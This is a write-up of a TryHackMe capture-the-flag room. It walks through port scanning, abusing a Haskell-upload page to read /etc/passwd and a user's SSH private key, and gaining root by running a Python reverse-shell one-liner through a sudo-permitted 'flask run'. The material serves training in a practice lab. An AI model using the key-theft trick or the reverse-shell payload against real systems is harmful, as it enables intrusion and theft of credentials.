Posts Haskhell writeup
Post
Cancel

Haskhell writeup

Description:

The Following Post is writeup of Haskhell room of tryhackme https://tryhackme.com/room/haskhell

MachineDetails
OSlinux
RatingMedium
Creatorsgtscout

Summary:

The machine have a webpage at port 5001 you will see a message from your prof about uploading assignment We made a Simple Haskell script for reading file(I am not good in Haskell). We got lucky about the permissions and get id_rsa printed. Login as user then for privesc we have sudo permissions to run flask app and we run python reverse shell as flask app.

Walkthrough:

Enumeration

Lets start with nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
nmap -sC -sV <ip>
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 1d:f3:53:f7:6d:5b:a1:d4:84:51:0d:dd:66:40:4d:90 (RSA)
|   256 26:7c:bd:33:8f:bf:09:ac:9e:e3:d3:0a:c3:34:bc:14 (ECDSA)
|_  256 d5:fb:55:a0:fd:e8:e1:ab:9e:46:af:b8:71:90:00:26 (ED25519)
5001/tcp open  http    Gunicorn 19.7.1
|_http-server-header: gunicorn/19.7.1
|_http-title: Homepage
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.91 seconds

We can see server at port 5001

let’s dirbust it

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌─[✗]─[silver@parrot]─[~]
└──╼ $gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.30.179:5001
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.30.179:5001
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/04 00:56:40 Starting gobuster
===============================================================
/submit (Status: 200)
===============================================================
2020/08/04 01:01:57 Finished
===============================================================

we got a submit dir let’s see what we can submit We need to make a haskell script to see if we can get any output or not

1
2
3
4
└──╼ $cat try.hs
main = do
 x <- readFile "/etc/passwd"
 putStr x

Now we know prof lets check out .ssh key So we changed the readfile to /home/prof/.ssh/id_rsa

we got key hurray crack using john

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
└──╼ $/usr/share/john/ssh2john.py id_rsa > crack.hash
id_rsa has no password!


prof@haskhell:~$ sudo -l
Matching Defaults entries for prof on haskhell:
    env_reset, env_keep+=FLASK_APP, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User prof may run the following commands on haskhell:
    (root) NOPASSWD: /usr/bin/flask run

Now we know flask run python let's try with python rev shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

    $ export FLASK_APP=hello.py
    $ export FLASK_DEBUG=1
    $ flask run

nc -lvnp 1234

Rooted

This post is licensed under CC BY 4.0 by the author.